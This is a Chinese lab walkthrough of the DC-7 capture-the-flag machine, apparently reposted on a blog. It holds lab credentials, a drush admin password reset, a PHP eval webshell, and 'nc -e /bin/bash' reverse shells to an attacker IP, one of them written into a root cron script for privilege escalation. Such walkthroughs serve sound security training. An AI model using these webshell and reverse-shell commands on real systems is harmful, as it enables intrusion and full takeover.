当前位置: 首页 > news >正文

DC-7 靶机

DC_7

信息搜集

存活检测

image-20231024085438718

详细扫描

image-20231024085540887

后台网页扫描

image-20231024124401722

网页信息搜集

image-20231024085507080

搜索相关信息

image-20231024085734738

image-20231024085911869

image-20231024085940503

在配置中发现了用户名密码字样

$username = "dc7user";
$password = "MdR3xOgB7#dW";

image-20231024090054193

ssh 登录

  • 尝试使用获取的账密进行登录

    网页登录失败

    image-20231024124513243

  • 尝试 ssh 登录

    成功登录

    image-20231024130241838

  • 登陆今后提示收到了一个邮件

    查看邮件内容

    cd /var/mail
    

    image-20231024130516576

  • 看到有 root 的计划任务

  • 查看执行计划任务的文件权限

    image-20231024125954322

    www-data 组拥有全部权限,而其他用户无修改权限

  • 查看 dc7user 属组,不属于 www-data,无法修改内容

    image-20231024130048738

  • 查看计划任务内容

    image-20231024125726351

    脚本内容显示

    进入 /var/www/html 目录可执行 drush 命令

    Drush 是一个用于管理 Drupal 网站的命令行工具。它提供了一组功能丰富的命令,可以在不使用网页界面的情况下执行各种 Drupal 管理任务。

    Drush 命令可以在终端或命令提示符中使用,并且可以在 Drupal 项目的根目录中执行

  • 可以使用 drush 命令更改用户的登陆密码

    cd /var/www/html/
    drush user-password admin --password="123456"
    

    image-20231024131937921

反弹 shell

  • 登录网页

    输入用户名和修改的密码,登录

    image-20231024132105472

  • 登录后发现可以编辑内容

    image-20231024132636513

  • 尝试上传一句话 php 木马

    <?php @eval($_POST['gjl']); ?>
    

    发现编辑时没有 php 解析

    image-20231024133038787

  • 拓展中可安装 php

    PHP 解释器 Drupal 官方连接

    https://ftp.drupal.org/files/projects/php-8.x-1.x-dev.tar.gz
    

    image-20231024133120870

    成功安装

    image-20231024133132911

  • 勾选 php,点击最下方的 install

    image-20231024133305703

  • 成功启动 php

    image-20231024133417813

  • 上传一句话木马

    image-20231024133216117

    选择 php code,点击 save

    image-20231024133601036

    image-20231024133736552

  • 打开蚁剑

    添加上传 php 所在的 url,测试链接

    image-20231024133830997

  • 打开连接,开启虚拟终端

    image-20231024133947875

  • kali 开启监听

    image-20231024133938625

  • 在蚁剑的虚拟终端输入反弹命令

    nc -e /bin/bash 10.4.7.146 7777
    

    image-20231024134119374

    成功反弹进 kali

提权

  • 此时获得了 www-data 的 shell

    image-20231024134308655

  • 根据前面搜集的信息可知,现在可以修改 root 的定时任务 /opt/scripts/backups.sh

  • kali 开启监听

    image-20231024134616970

  • 添加提权命令

    echo "nc -e /bin/bash 10.4.7.146 6666" > /opt/scripts/backups.sh
    

    image-20231024134741234

    因为 backup.sh 是以 root 权限运行,连接反弹 shell 后获取的权限为 root 权限

  • 等待计划任务自动执行(运气不好最长等 15 分钟,计划任务 15 分钟执行一次)

    image-20231024135030629

  • 提权成功

    image-20231024140232844

总结

  • drush 修改 Drupal 网站账户密码

  • 计划任务、反弹 shell 提权

http://www.lryc.cn/news/204250.html

相关文章:

  • Mr.Alright---MTK安卓13 抬手亮屏功能的逻辑
  • thinkPHP5.0字符集修改为utf8mb4
  • [架构之路-242]:目标系统 - 纵向分层 - 应用程序的类型与演进过程(单机应用程序、网络应用程序、分布式应用程序、云端应用程序、云原生应用程序)
  • Jackson 反序列化失败,出现JSON: Unrecognized field
  • vscode代码快捷输入
  • 【微服务】Feign 整合 Sentinel,深入探索 Sentinel 的隔离和熔断降级规则,以及授权规则和自定义异常返回结果
  • Kurento多对多webrtc会议搭建测试
  • 蓝桥杯 (饮料换购,C++)
  • 《java核心卷Ⅰ》知识点总结(可作面试题)
  • 发成绩小程序,一键群发成绩给家长,省事
  • barzilar_borwein算法微调函数的优化收敛
  • SpringBoot篇---第一篇
  • 算法通关村第二关-白银挑战反转链表拓展问题
  • 【rust/树莓派】使用rppalembedded-graphics控制st7789 LCD屏幕
  • WebSocket—STOMP详解(官方原版)
  • 淘宝/天猫获取购买到的商品订单物流信息 API分享
  • PS软件 点击 “另存为 Web 所用格式” ,提示错误 无法完成操作 系统找不到指定路径
  • 解决“您点击的链接已过期”;The Link You Followed Has Expired的问题
  • 说说对ajax、axios、jsonp的理解
  • 黄金代理这么多,怎么选?
  • 一个工作三年的前端是如何做性能优化的
  • 如何确定自己的armbian系统是不是ARM64架构
  • leetcode_1155 掷骰子等于目标和的方法数
  • 2023年中国精准放疗未来展望分析:将朝着精准化、数字化和智能化发展[图]
  • 大数据之LibrA数据库常见术语(二)
  • 华为面试题
  • 进阶JAVA篇-深入了解 List 系列集合
  • typeof 与 instanceof 区别
  • python 之计算矩阵乘法
  • 【Linux】进程优先级|进程并发概念|在vim中批量化注释